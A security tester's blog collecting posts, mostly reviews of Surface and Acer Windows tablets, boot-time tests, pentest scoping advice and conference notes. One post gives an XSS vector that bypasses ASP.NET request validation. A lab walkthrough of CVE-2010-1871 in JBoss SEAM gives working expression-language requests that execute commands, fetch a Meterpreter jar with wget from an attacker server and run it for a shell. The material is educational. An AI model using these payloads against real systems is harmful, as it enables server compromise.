Raesene's Ramblings

I just got my Surface Pro a few days ago – albeit I had to import it from US with the help of a friend over there.  I’ve not had it for long so these are initial impressions I will add to later, but so far I am very pleased with it and think it is going to greatly appeal to businesses over here when it is released in UK (I hope Microsoft are reading this….).

As I mentioned in an earlier posting, I have been using Windows 8 on touch devices since it came out, first on an Iconia W500 tablet I upgraded from Win 7 myself, then RT on the Surface since Sept 2012 – so this is really a comparison between the Surface Pro and what has gone before.

Hardware

The first thing you notice when you are an RT user and take the Pro out of the box is that it is a fair bit heavier and thicker than the earlier device.  I suspect, however, that you would not realize this if you hadn’t been a heavy user of the other one.  It weighs in at 900 grams which is just enough more than the 680 grams of the Surface RT (or the 662g of the IPad3) to make you feel the difference.  So as a tablet it is on the heavy side, but by no manner of means unusably so, and I suspect that after a while I won’t notice the difference very much.  It is 1.3cm thick compared to 0.94 for the IPad3 and the Surface RT – but I don’t really find that much of a downside.

Because it has an Intel Core i5 CPU rather than the relatively low powered ARM processor in other tablet devices, it runs relatively hot and has to have internal fans.  In the time I have been using it I have yet to hear the fans come on and it is effectively completely silent.  The vent for the fans is a slim line along the top of the tablet which I would never have noticed if I hadn’t been actively looking for them (this is most of the reason for the extra thickness of the device).  The Pro also feels very slightly warm on the back of the case which the RT does not (although it is my understanding that the iPad 3 gets warm as well).  This is in comparison with the Iconia I had until last year where the fans were on almost constantly and you could use the case as a hot water bottle (I’m not knocking the Iconia btw – it was a nice machine for its time – but shows how quickly technology advances).

The general build of the tablet is very nice indeed and shows the same attention to detail as on the RT model, with the kickstand being a particularly important and well-designed feature considering that this is a productivity machine that is going to be used in laptop mode a lot.  The screen on the RT was nice enough, but the one on the Pro is absolutely lovely – very high resolution and fantastic colour depth.  It has great port specifications for a tablet with a full sized USB 3 port (as against the USB 2 on the RT), a micro SD slot and a mini DisplayPort which can be used to plug it in to a VGA or HDMI device.  For anyone sad enough to have both tablets – the two expensive video cables I bought for the RT are not compatible with the Pro, although it is compatible with any standard mini DisplayPort adapter (although apparently with some of them you have to pare a bit of plastic off the cable to allow for the bevel on the Surface’s port).  I now have it running a 24” monitor and a Mimo USB mini monitor and very nice it looks with them.

As far as disk space is concerned, there has been a lot of MS bashing around the Surface and inadequate disk space.  I think this is nonsense as far as the 128GB model is concerned.  Out of the box I had 84G free before I installed anything else, and I could have increased this by moving the recovery partition to a USB stick.  Considering that the 128G model is only marginally more expensive that the 64G, I am not sure I would recommend the latter, and this has been borne out by sales of both models, where the 128 has been regularly out of stock.

The stylus/pen that comes with the Pro is brilliant.  Night and day between that and trying to write on the handwriting recognition keyboard with your finger or a standard stylus.

Battery was another issue that came up before the Surface Pro was released and I think this time MS were a little too eager to be honest in their announcements to the extent of under-rating the device.  I reckon that yesterday I had about five and a half hours moderate use (web browsing, Office, music, a few videos) etc out of it.  At that point it was not completely exhausted (but I was) so I put it on charge before it ran out.  I think it might get six hours if you pushed it, and that could be rated as poor compared with premium tablets, but good for an Ultrabook.    It does not have the ‘always on’ feature of ARM tablets where the screen is immediately available when you pull the keyboard back.  Instead it is more like a standard tablet ‘waking up’ where you touch the power button and it takes about five seconds to resume.

As I said in my review of the Surface RT, I am not very keen on the proprietal power adaptor which is not easy to connect to the tablet and seems a bit loose when it does connect.  I’m also not convinced that attaching the stylus to the power connector when not in use is a good idea because it then can’t be used while the device is charging.

So in case I sound negative about the Pro compared to the RT (which I didn’t mean to) here is the really big advantage it has, which to my mind is pretty much the deciding factor for professionals …

Software

I’ve worked with Windows RT including (tut tut) the jail-broken version for some time now and I really like it.  For MUI apps it runs brilliantly; it is fine for Office Home (which is included with the tablet).  As a general leisure device (browsing, music, books, video) and for occasional business use with Office and a web browser, it is absolutely great.   Additionally it can participate in homegroups with other Windows PCs and use Windows utilities like the snipping tool, explorer, task manager etc.  I am not a typical home user – but my 73 year old mother is – and for her it does everything her laptop did and more, in a much smaller form factor and with a much better battery life.  An iPad would just not have done the trick for her because she is a long time Windows user with a need for access to the file system, ability to access shares on file servers etc (without having to jump through hoops to do so).

Strangely, it was not until I jail broke mine and tried to use it in my professional capacity as a tester that I came across limitations with the RT version it which I hadn’t even thought about, but which make me realize how much I need and value the full version of Windows.

Availability of applications.  Professional people and power users need specific applications and these are not generally ones they can chose on the basis of what is available in a company store or select themselves.  They are predetermined by the company they work for, and let’s face it, unless the company is part of the small minority which use Linux or Macs – they are going to be Windows applications.  I think the respective stores for Microsoft, Apple and Google are getting there and may possibly replace desktop applications for many functions, but I don’t think the vast body of professional software which has been built up for Windows is going anywhere in a hurry.   In my professional capacity I have many applications I need which simply only run in the full version of Windows.

Performance.  The ARM processor in the RT Surface runs the applications designed for it very nicely.  It is only when you jail break it and try other stuff that you realize why MS did not allow it because a lot of them run pretty slowly and drain the battery badly.

The huge advantage of the Surface Pro is that it is a proper Windows 8 Pro PC which will run every Windows 7 or 8 compatible application out of the box – in practice most applications written for PCs in the last 10+ years.  I have a Windows experience index on the Pro of 5.61 which beats my 18 month old desktop by a decent distance.

Manageability

Probably most end users and standard geeks won’t care much about this – but having been involved in Corporate IT in a largely Microsoft environment for many years – I think I can say that many Sys Admins will.  The Surface Pro is a standard Windows PC which can be managed like any other through Active Directory and Group Policy.  It has all the security and granularity built up over the last twenty years; it can join a domain; it needs no special software installed on it and doesn’t require IT Teams to install special software on servers or jump through any hoops to get it working or make it comply with internal policy.   To my mind, this is the killer feature that will make IT departments want to run with this device rather than iPads or Androids.

In Conclusion

This week I will be trailing the Surface Pro out in earnest by running it as my primary PC for an external test.  So far it seems to be very fast and I have no real doubts that it can easily complete the task.

But actually – what is this device?  It is not quite a tablet because it is not as light as an IPad and doesn’t have the same battery stats.  It isn’t even really an Ultrabook because the form factor and display are not as good as some of the high end devices available from OEMs like Sony.  So maybe it needs to have a brand new name which would suit it and show it off to its best advantage. Perhaps an Ultratablet?  Not sure it could be sold this way but something along the lines of ‘Surface – 95% of the best tablet and 95% of the best laptop experience’

Anyway – I think both Surfaces are really great.  If I were asked which one you should get then ideally I would say ‘both’.  Here is a picture of mine sitting next to each.

We test a lot of ASP.NET web applications.  On about 40% of them, we notice when testing for cross-site scripting that the only thing protecting against it is the framework's own Request Validation.  In other words, when you enter a basic XSS vector - you get a Yellow Screen warning that your input has been blocked as potentially dangerous.

This is all very well in its way - but for years we have been putting in our reports that relying on it is bad practice because it is a pretty crude control mechanism.  Firstly, it is pretty ugly and makes you think right from the start that the developer hasn't put much TLC into his product, and secondly and more importantly, Microsoft themselves do not recommend it as a substitute for a proper input validation method created within the application itself, as there is no way that the designers of the framework can predict what type of content an individual application will need to accept in a given field.

So now there are XSS vectors that get round this - for example

http://www.vulnerablesite.com/login.aspx?param=<%tag style="xss:expression(alert(123))" >

MS have said that they are not going to fix it - which seems justifiable as they never recommended its use in the first place.

I can't help wondering if all the sites we have seen that have used this have been back over their code and done their input validation properly this time.  Sadly I suspect that the answer to this is likely to be no in a large number of cases.

This is a shame, because a lot of the problems are simply caused by developers accepting characters into fields where they simply don't have to.  For example - we see a lot of telephone number fields that only need to accept numerics that take '<>' and other dangerous characters.   And for the rest, simply encoding all user supplied content is not hard and protects against the vast majority of issues.

I am so sad - but while I had the old versions of Operating Systems fired up for my previous post - I couldn't resist having a look at some modern websites with the default browser that came with them.

Specifically I looked at IE2 (NT 4), IE5 Windows 2000) and Netscape Communicator 4.76

As might have been expected - IE2 didn't really work at all.  www.bbc.co.uk seemed to start loading up JavaScript and then did nothing as did www.google.com.  www.wikipedia.org and www.scotsts.com generated JavaScript errors but then showed a minimalist version of the page - as did www.microsoft.com.  The only site that actually worked properly was our old friend www.armory.com which says it is best viewed in 'any browser' and does what it says on the tin.  Netscape was about the same although it did make an attempt at Google's site.   Microsoft's site just crashed the browser.

IE5 was a bit of a better story.  All the sites I originally tried actually loaded up.   I turned JavaScript error reporting off and all the pages I originally tried either work or sort of work.  By which I mean that a lot of them will load and are usable but don't look that nice.  www.facebook .com and www.twitter.com will not load at all - but outside that I couldn't find anything that completely didn't work and www.google.com scored some points by working natively with no problems at all and looking completely normal.  It actually was not quite as bad a browser as I thought it was going to be considering it is twelve years old and it is probably just about usable.  The security on it is going to be awful though.

We got a new Lenovo T430U yesterday and with its new SSD we discovered it boots from the BIOS to Windows 8 in three seconds.

I remember corporate machines back in the 90s taking 20 minutes to boot - so I got to thinking - is the improvement the modern hardware or the modern OS - or a combination of the two.

So in the interests of scientific enquiry I gave it a go and got the following results - all using VMware workstation on a Intel Core -5 CPU with 16G RAM.  I deliberately did not use VMware tools for any of them because they are not available for the older operating systems and do tend to speed things up.  I also compared this with Windows RT on my little Surface with its ARM processor and 2GB RAM, and also with the iPad, the Xbox and two different phones.

Windows 7 Professional - 20 seconds

Windows NT 4 Workstation - 18 seconds

Windows Server 2000 - 22 seconds

Windows 8 Enterprise - 6 seconds for a full restart or 4 seconds from the 'shutdown' state which is really a sort of suspend to disk.

Ubuntu Linux was very slightly longer than Windows 8 at about 7 seconds - also way faster than it used to be.

Mac Book Air 13" 2012 - 9 seconds - not bad either.

I then had a look at our other leisure type devices which are largely ARM based and noted that on the whole they were a lot slower than the Intel based stuff - though of course they don't tend to be stuff you shut down that often in the normal run of things.

Surface RT - 23 seconds

IPad 3 - 31 seconds

Nexus 7 - 46 seconds

HTC 8X (Windows Phone 8) - 37 seconds

iPhone 4S (iOS 6) - 29 seconds

Xbox 360 (IBM Xenon Power PC processor) - 41 seconds

Trouble with these devices it that it is impossible to known how much of it is the OS and how much the hardware.  For example on my 8X the Windows Phone boot screen only showed for one second - the rest was all the HTC logo.  I don't have my old Nokia 800 WP7 to hand - but I seem to remember that booted way quicker.

There has obviously been a huge improvement between Windows 7 and 8 and between old and new versions of Linux, but also modern hardware boots old operating systems greatly faster than you would imagine.

I bought the Surface RT back in November as a replacement for the Iconia W500 Tablet I reviewed on this site previously.  Having had it for a few months now - I thought it would be about time for a review.  I've read some shocking rubbish about the Surface specifically and Windows 8 in general - so I'd like to put the record straight as probably one of the few people who have been using a Windows 8 tablet since inception (I installed the Consumer Preview the day it came out)

Hardware

With a couple of minor niggles, the hardware on this device is first class.  Everything about it screams quality and attention to detail from the casing to the kickstand to the screen itself.  I recently had the opportunity to demonstrate the Surface to a number of people at a conference, and the general consensus  was that the screen was butter smooth and the keyboard pretty good to type with (not as good as a full-on PC keyboard - but excellent for something only a couple of millimetres thick).  With the Iconia I used to have - the screen was sluggish compared to the iPad; with the Surface it is possibly even more responsive.   Also the screen is so bright and vibrant that I can't really tell that the resolution is lower than the iPad (though perhaps my 46 year old eyes are something to do with that!).  Having the USB port and mini HDMI adaptor is really convenient - I have plugged the Surface into an external monitor and USB hub attaching to external keyboard/mouse, and spent a whole day working on a presentation using PowerPoint and doing internet research using IE10.  After the first half hour I didn't even notice the fact it was a tablet rather than a PC.

Anyone who tells you the battery life is nine hours either has something wrong with his Surface or is doing something seriously weird with it.  I find that using IE, listening to music, playing games, working in Office, reading books etc, I get about 12 to 13 hours out of it - commensurate with the iPad.   It is also very slightly heavier but also very slightly thinner than the iPad and has a slightly different form profile which to my mind makes it slight worse for reading books and slightly better for watching videos.  This would be entirely a matter of personal preference though.

My niggles are as simple as this.  Firstly - the connector for the power adaptor is not of the best.  It is supposedly magnetic but doesn't really clip in place very easily particularly in contrast to the keyboard where the magnetic connector is brilliant.  It is also highly proprietal and quite expensive to buy a replacement for.    Secondly - be very careful when buying a case for the Surface or any Windows 8 device.  There are a lot of cases advertised on the internet which simply do not work with Windows 8 because no one at these companies has bothered to look at the way the OS works and therefore don't realize that you have to swipe over the side of the device to access a lot of its functionality.  So check that the case really is for the Surface and isn't just a rebadged iPad case.

Rating - 9/10

Software

There is a huge amount of misunderstanding about Windows 8 in general and Windows RT in particular out there.....

a)  Windows 8 Pro is not that radically different to Windows 7 if you don't want it to be.  I personally like the modern interface and use it a lot.  But if you don't like it - pin the 10 programs you use to your taskbar and use it as Windows 7.  I can honestly say that since the very early beta days I have experienced two BSODs; one was me messing about with an early version of the Windows Phone SDK and the other was a dodgy website with some ancient version of Adobe Reader.  Windows 8 is rock solid, works with every legacy program I have tried and runs desktop programs in exactly the same way as Windows 7 did.  The only difference you will see in desktop mode is the absence of the start button (and if that really, really bothers you - install Start8) and the greatly improved features in Task Manager, File Explorer (it has the ribbon!) etc.  There are other improvements behind the scenes, but you will not notice them when using it.  I suppose the other thing you may just notice is that your machine boots from the BIOS in between 8 and 12 seconds which is a huge improvement from previous versious.  You can turn off the signing requirement in the UEFI BIOS on a Windows 8 device and load any operating system you see fit on it - it is only Windows RT devices which are restricted from doing this to protect end-users from malware.

b)  Windows RT is a bit different.  Basically it is a full version of Windows cross-compiled to the ARM processor with the reasoning behind it being to improve battery life and reduce the risk to end users of compromising their machines.  Out of the box, it only runs apps out of the Windows Store and certain apps (such as Office and most of the Windows utilities) signed by MS.    I presented about this OS on the Surface at Securi-Tay2 recently and my conclusion was that for about 95% of users - it does exactly what they would want.  It runs MUI apps; it runs Office; it runs Windows desktop utilities.  It doesn't easily let the end user turn off the firewall, the virus checker or the update service.  So for a typical use scenario that is ideal.  Windows RT would not work for me as a heavy professional user of niche software - but then as it is essentially a tablet - I would not expect it to.  But still, the vanilla device can access the filesystem, command prompts (including PowerShell), registry editor, map network drives, participate in homegroups etc which to my mind is the vast majority of what you need except as the type of power user that the tablet is not aimed at anyway.  I must also say that there is a jailbreak exploit available for it which makes it far more useful as a power user's laptop (it will then run any desktop programs cross-compiled for ARM)  and that to my mind Microsoft should seriously consider allowing this to become an official feature for anyone who has a developer's license for the Windows Store (with appropriate disclaimers that they are no longer responsible for support of any cracked device).

So aside from that, Windows RT looks beautiful on the Surface - really vibrant and eye-catching.  It runs a good variety of apps - and if you really care about how many there are in the Windows Store compared to iTunes, firstly ask yourself how many fart apps and bad Twitter clients you actually need, and secondly, wait six months because with the install base for Windows being the size it is I can bet you that the store is going to be huge.

Software - OS - 9/10

Software - Apps 7/10 (at the moment - sure it will improve)

So I can thoroughly recommend the Surface.  To my mind it does everything the iPad does and much much more.    Of course it is a matter of opinion but I think the Surface is the best device  ever.

We both attended the Securitay2 Conference in Dundee yesterday.  This was organized by the students from the Ethical Hacking course at Abertay University - and it turned out to be really good.  I've been to a number of professional conferences such as 44Con and BruCon - and I thought the home-brewed Scottish version was just as good and considerably less expensive (£10 for a ticket).  Really good selection of talks (Ian Ferguson's talk on encryption was my favourite) and it was nice to see the number of professional testers we had talking to the Student population who will be our next generation....  Well organized too - the Students responsible should give themselves a big pat on the back (and put their involvement on their CVs).

I spoke about the Windows RT Surface Device and using PowerShell on it for Pentesting, and Rory spoke about automating Pen Tests with scripts (he is really good with Ruby).  Rory is doing a separate post with his slides.

My talk went reasonably well (I think) apart from the fact that although I had tested it in advance, the projector in the main auditorium didn't seem to take to the Surface and I had to use my ThinkPad instead.

As promised - I'm attaching my presentation to this post, so you can access that here

Not really security related but I recently aquired a Windows tablet in order to try out the touch features of Windows 8.  It was quite an interesting experience getting the new OS on to it, but now I have, I'd like to compare the W500's features and performance with the iPad I have been using for a couple of years now.

First just a couple of things about the install.  I attached an external USB DVD drive to the tablet which used up both the available ports on the tablet.  This turned out to be a bad plan because I didn't consider at the time (obvious in retrospect as it is) that the drivers for the touch screen required the OS to be installed and there was therefore no way to enter the product key during the install.  So back to square one - I had to use a USB hub so that I could plug a keyboard in as well.  With hindsight I would have been better installing off a USB key (there are instructions on how to do this on the Internet).  Once this was done, everything went smoothly, but the touch screen didn't work properly (no right click, no auto-rotate).  After a bit of searching, I found that you have to go to the Acer site and reinstall the Windows 7 drivers for all the proprietory peripherals - after that everthing works fine.

So first impressions of the OS is pretty good.  The Metro Interface is very attractive and (for a beta) remarkably smooth and stable.  It is slightly jarring at first moving backwards and forwards between Metro and the legacy desktop - plus the lack of the start button is rather annoying but I've actually found I've got used to it pretty quickly.  The only significant problem I have with it now is that sometimes when the tablet is left in sleep mode for a long time with Windows Explorer open, it hangs the program when you wake the tablet up.

Comparing it to the iPad, first some negative features.  It weighs nearly twice as much as the iPad 3  and the battery life is not nearly as good.  After 8 hours on standby, the W500 was only on about quarter charge, whereas I can leave the iPad on standby for days without it losing any appreciable amount of charge.  The screen rotation on the W500 is good, but it doesn't have the transition affect the iPad does, so the screen goes black briefly when you rotate it.

Its good features (of which there are quite a lot).  It is a proper fully fledged PC with 2G RAM and a dual core processor which runs proper Windows apps (pretty smoothly on Win 8).  I wouldn't want to use the virtual keyboard to write a pentest report with a fancy template, but for short periods of time it is perfectly usable and (I think) nicer than the Apple one.  Plugged in to its docking station, you could easily work on a Word document on it, which is pretty much essential to our jobs.  It also has two USB ports and a SD card reader which are features I really miss in the iPad.  I tested installing a couple of programs on the SD card because the internal SSD is pretty small at 33G, and they run tolerably quickly.

So my verdict.  If you want a purely locked down tablet with a lovely smooth experience and a great battery life - I would go with the iPad.  However if you want to do a bit more and have a combined tablet/laptop that you can actually do work on - I think the W500 is a better bet.  Personally I am keeping both....

Getting the best from your Web Application Pentest

We’ve noticed during the many penetration tests we have carried out, that a lot of companies do not always get the best value for money from the tester’s time they have paid for.  Below are some general observations from a tester’s point of view, and some hints for IT Managers and developers on what they should be asking for.

a)      Black box is not always the best approach.  The vast majority of tests we carry out completely blind – in other words we are not given any information about the systems we are testing (for example the platform the application runs on, the development framework used to create it etc.).  This means that we have to spend a considerable proportion of our time finding out basic details which could easily be supplied in advance.  The point is that we can find these things out, and we are time limited, whilst an attacker who is determined to get into your application may have all the time in the world.  By having a preliminary meeting with the tester and supplying some basic details about the application, you save him a lot of time which you have paid for and enable him to focus on the deeper issues rather than the superficial stuff.

b)      Fix what you can in advance.  We get the same sets of basic findings over and over again.  SSLv2 enabled.  HttpOnly flags not set on session cookies.  Poor password management policy etc. etc. etc.  These all take time to discover and time to report on – and that time is not being spent on finding out the serious issues which may get your application compromised. This policy may not get you a big fat report to wave at management, but it will get you a more thorough test.

c)       Think about what systems should be in scope.  We often get told that our scope is one application, but on starting to test we find that it is closely linked in with another application that is out of scope.  On one notable occasion the in scope ASP.NET application was reasonably secure but part of its functionality was served by an ancient looking PHP system likely had a large number of issues.  This makes no sense – so when you are scoping a test, don’t just think about the application itself, think about related applications and also the infrastructure that they rely on (DNS, AD, SMTP etc).

d)      Don’t test web applications in live unless you absolutely have to.  Testing in live does not always give you the best value for money, because in a lot of cases, testers have to be more careful with how they scan to avoid any adverse impact on the system.  Also, if your application has a lot of input fields, there is no way they can all be tested manually in a short time-span, so the only way to get full coverage is to run scanners, and scanners create data and (on occasion) crash servers. At least here in UK, a decent percentage of customers do not want live systems to be actually compromised, so if you want a full on Pentest rather than a risk assessment, give the tester access to a pre-prod system.

e)      Don’t tie your tester’s hands behind his back.  Bad guys will not throttle back their scanners because you have a flaky firewall.  They will not worry about locking your users’ accounts.  They will not refrain from creating data on your site.  They will not restrain their activities to business hours.  If you do any (or all) of these things you are not getting a full test.  So try to fix any issues you know you have in advance, and then let the tester have full access.

f)       Testing sites still in active development is largely pointless.  Many are the tests we have done where we are told not to test parts of it because the developers are still working on it.  For reasons that should be obvious, this is a bit of a waste of time.  Making a change to one function and accidentally bypassing input validation can introduce multiple errors in different (and sometimes unexpected) parts of the application.  Ideally the order of events should be something along the lines of Development -> UAT -> Redevelopment -> Security Test in test environment -> Redevelopment -> Move to live -> further Security Test.  But if time or money does not permit – at the very least wait until you have finished coding before you start testing.

g)      Don’t retest unless you think you have fixed the problems.  We frequently do retests where virtually none of the original issues have been fixed.  This is the ultimate exercise in futility and is a huge waste of your company’s money.  Fix the issues yourself and if you don’t know how, Google is your friend.  If you really can’t find out how to fix something – spend your money on some consultancy rather than on a pointless retest.

h)      If you know there is a problem you can’t fix – tell the tester.  Don’t let the tester waste huge amounts of time testing and writing up something which you know about already (for example if there is some limitation of the framework or database you are using).  Having a known security vulnerability is bad, but spending money on having someone write about it is even worse.

i)        Consider using part of the time you have paid for as a corrective exercise.  Following on from point g), dependent on what the issues are you might want to spend part of your time with the tester on taking advice on how to fix the problems.  Testers aren’t generally skilled developers in any particular technology, but we can normally help with configuration issues and at least point in the right direction for more development specific vulnerabilities.

j)        Verbose reports are not always required.  Normally on a five day test, one day is reserved for report writing (proportionally less or more for shorter or longer tests).  The reason this takes so long is that many testing companies have an elaborate report format with graphics, slides, executive summary etc.  In many cases the findings could be summarized in an email which would take half an hour to write, instead of a fifty page report which takes a whole day.  So if you don’t require a formal report, you can get more value for money out of your test by getting the tester to write it as an email summary.  You will also have a happy tester!!

I had a chance to look at CVE-2010-1871 recently which is a vulnerability in JBoss expression language.  As it was an interesting looking vulnerability, I thought it'd be worth walking it through to the point of getting a shell on a vulnerable box, and as it took a bit of fiddling and googling on my part to get there, I figured it could be worth writing up.

There's a good write-up from the guy who discovered the vulnerability here but the basics of the vulnerability is that version of the JBoss SEAM framework have an expression language which can be used to directly execute java code.  (Un)fortuntely it was possible for certain URL parameters passed by users of the application to be executed, which introduces a vulnerability.

In the blog post Meder goes through the process of finding the appropriate java classess and executing code using reflection, so far so good.  When I came to walk through the PoC exploit (creating a directory on the vulnerable server) the last command
/seam-booking/home.seam?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[19].invoke(expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[7].invoke(null), 'mkdir /tmp/PWNED')}

wasn't working for me... so Google time :) (NB, the reference to seam-booking/home.seam is for the sample app used for the PoC, but this should work on any SEAM framework app)

Looking round to see if anyone else had any joy with this vuln. I came across a post on Stackoverflow , where it looked like someone was getting targeted with this issue in the wild (one to take note of if you run  JBoss!).  From that it looks like the attackers had come to a slightly different means of exploiting the issue, and testing it seemed to work well.  So the basic PoC is setting the actionOutcome parameter to

actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[6].invoke(expressions.getClass().forName('java.lang.Runtime')).exec('mkdir%20/tmp/pwned')}

This has worked ok for me on Linux and windows (as target platforms).

Great, so now we have a basic PoC how do we move onto getting a full shell on our vulnerable system?  There's doubtless a number of ways of doing this, but here's one I hit on which seems to work pretty reliably.

Given that the target server is running a JBoss service, it's a reasonable assumption that it will have java installed, so we can breakout the Java Meterpreter.  First up create the payload using msfpayload.  I used bind_tcp in the lab and it's worth noting that the default metasploit port (4444) is in use, so using a different on (eg, 5556) was a good plan.

./msfpayload java/meterpreter/bind_tcp LPORT=5556 X > lin.jar

Gives us our file payload, now we just need to get it deployed to the target system.  On linux, it's a fair bet that wget will be installed, so I used that to download the file from a webserver

/seam-booking/home.seam?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[6].invoke(expressions.getClass().forName('java.lang.Runtime')).exec('wget%20-O%20/tmp/lin.jar%20http://<server>/lin.jar')}

This places the file into /tmp, so now we just need to run it, which is pretty straightforward

/seam-booking/home.seam?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[6].invoke(expressions.getClass().forName('java.lang.Runtime')).exec('java%20-jar%20/tmp/lin.jar')}

Having done that, it's just a question of spinning up the metasploit exploit handler and connecting to your waiting meterpreter shell.

Over the last little while some of the videos from B-Sides London have been getting put up on-line, well worth a look if you get a chance.

The presentations are over on slideshare and the videos are on blip.tv

The slides for my talk "Pen Testing Must Die" are here and the video is here